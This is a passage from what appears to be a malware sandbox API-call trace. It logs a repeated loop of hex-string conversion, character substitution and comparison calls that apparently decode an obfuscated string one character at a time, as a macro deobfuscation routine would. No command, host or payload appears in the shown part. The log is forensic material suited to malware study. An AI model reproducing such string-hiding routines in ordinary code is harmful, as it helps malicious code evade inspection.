[0175.211] free (_Block=0x11f50080) [0175.211] VarI2FromStr (in: strIn="&H8e", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.211] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="8") returned 1 [0175.211] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.211] malloc (_Size=0xa0) returned 0x11f50080 [0175.212] free (_Block=0x11f50080) [0175.212] VarI2FromStr (in: strIn="&Hda", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.212] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0175.212] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.212] malloc (_Size=0xa0) returned 0x11f50080 [0175.212] free (_Block=0x11f50080) [0175.212] VarI2FromStr (in: strIn="&He5", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.212] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0175.212] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.212] malloc (_Size=0xa0) returned 0x11f50080 [0175.212] free (_Block=0x11f50080) [0175.212] VarI2FromStr (in: strIn="&H7f", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.212] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0175.213] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.213] malloc (_Size=0xa0) returned 0x11f50080 [0175.213] free (_Block=0x11f50080) [0175.213] VarI2FromStr (in: strIn="&Hd1", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.213] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0175.213] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.213] malloc (_Size=0xa0) returned 0x11f50080 [0175.213] free (_Block=0x11f50080) [0175.213] VarI2FromStr (in: strIn="&He3", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="m\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.213] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0175.213] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.213] malloc (_Size=0xa0) returned 0x11f50080 [0175.214] free (_Block=0x11f50080) [0175.214] VarI2FromStr (in: strIn="&Hb4", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.214] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="O") returned 1 [0175.214] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.214] malloc (_Size=0xa0) returned 0x11f50080 [0175.214] free (_Block=0x11f50080) [0175.214] VarI2FromStr (in: strIn="&Hc8", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.214] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="z") returned 1 [0175.214] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x1 [0175.214] malloc (_Size=0xa0) returned 0x11f50080 [0175.214] free (_Block=0x11f50080) [0175.214] VarI2FromStr (in: strIn="&Hdd", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.215] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0175.215] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.215] malloc (_Size=0xa0) returned 0x11f50080 [0175.215] free (_Block=0x11f50080) [0175.215] VarI2FromStr (in: strIn="&Hc8", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.215] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="Z") returned 1 [0175.215] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.215] malloc (_Size=0xa0) returned 0x11f50080 [0175.215] free (_Block=0x11f50080) [0175.215] VarI2FromStr (in: strIn="&Hb2", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.215] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="X") returned 1 [0175.216] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.216] malloc (_Size=0xa0) returned 0x11f50080 [0175.216] free (_Block=0x11f50080) [0175.216] VarI2FromStr (in: strIn="&Hdf", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.216] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="z") returned 1 [0175.216] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.216] malloc (_Size=0xa0) returned 0x11f50080 [0175.216] free (_Block=0x11f50080) [0175.216] VarI2FromStr (in: strIn="&H99", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.216] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0175.216] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.216] malloc (_Size=0xa0) returned 0x11f50080 [0175.216] free (_Block=0x11f50080) [0175.217] VarI2FromStr (in: strIn="&Ha2", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.217] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0175.217] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.217] malloc (_Size=0xa0) returned 0x11f50080 [0175.217] free (_Block=0x11f50080) [0175.217] VarI2FromStr (in: strIn="&Hc1", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.217] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0175.217] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.217] malloc (_Size=0xa0) returned 0x11f50080 [0175.217] free (_Block=0x11f50080) [0175.217] VarI2FromStr (in: strIn="&Hc0", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.217] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="q") returned 1 [0175.218] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.218] malloc (_Size=0xa0) returned 0x11f50080 [0175.218] free (_Block=0x11f50080) [0175.218] VarI2FromStr (in: strIn="&Ha8", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.218] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.218] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="8") returned 1 [0175.218] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.218] malloc (_Size=0xa0) returned 0x11f50080 [0175.218] free (_Block=0x11f50080) [0175.218] VarI2FromStr (in: strIn="&Ha4", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="m\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.218] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.218] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="7") returned 1 [0175.218] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.218] malloc (_Size=0xa0) returned 0x11f50080 [0175.218] free (_Block=0x11f50080) [0175.218] VarI2FromStr (in: strIn="&Hb4", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.219] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="O") returned 1 [0175.219] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.219] malloc (_Size=0xa0) returned 0x11f50080 [0175.219] free (_Block=0x11f50080) [0175.219] VarI2FromStr (in: strIn="&Ha4", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.219] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0175.219] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x1 [0175.219] malloc (_Size=0xa0) returned 0x11f50080 [0175.219] free (_Block=0x11f50080) [0175.219] VarI2FromStr (in: strIn="&Hd2", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.219] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0175.219] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.220] malloc (_Size=0xa0) returned 0x11f50080 [0175.220] free (_Block=0x11f50080) [0175.220] VarI2FromStr (in: strIn="&Hbe", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.220] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="P") returned 1 [0175.220] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.220] malloc (_Size=0xa0) returned 0x11f50080 [0175.220] free (_Block=0x11f50080) [0175.220] VarI2FromStr (in: strIn="&Ha3", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.220] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="I") returned 1 [0175.220] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.220] malloc (_Size=0xa0) returned 0x11f50080 [0175.220] free (_Block=0x11f50080) [0175.221] VarI2FromStr (in: strIn="&Hb1", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.221] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="L") returned 1 [0175.221] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.221] malloc (_Size=0xa0) returned 0x11f50080 [0175.221] free (_Block=0x11f50080) [0175.221] VarI2FromStr (in: strIn="&H8f", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.221] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="9") returned 1 [0175.221] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.221] malloc (_Size=0xa0) returned 0x11f50080 [0175.221] free (_Block=0x11f50080) [0175.221] VarI2FromStr (in: strIn="&Hba", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.221] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="G") returned 1 [0175.222] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.222] malloc (_Size=0xa0) returned 0x11f50080 [0175.222] free (_Block=0x11f50080) [0175.222] VarI2FromStr (in: strIn="&He1", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.222] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0175.222] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.222] malloc (_Size=0xa0) returned 0x11f50080 [0175.222] free (_Block=0x11f50080) [0175.222] VarI2FromStr (in: strIn="&Hc9", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.222] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, 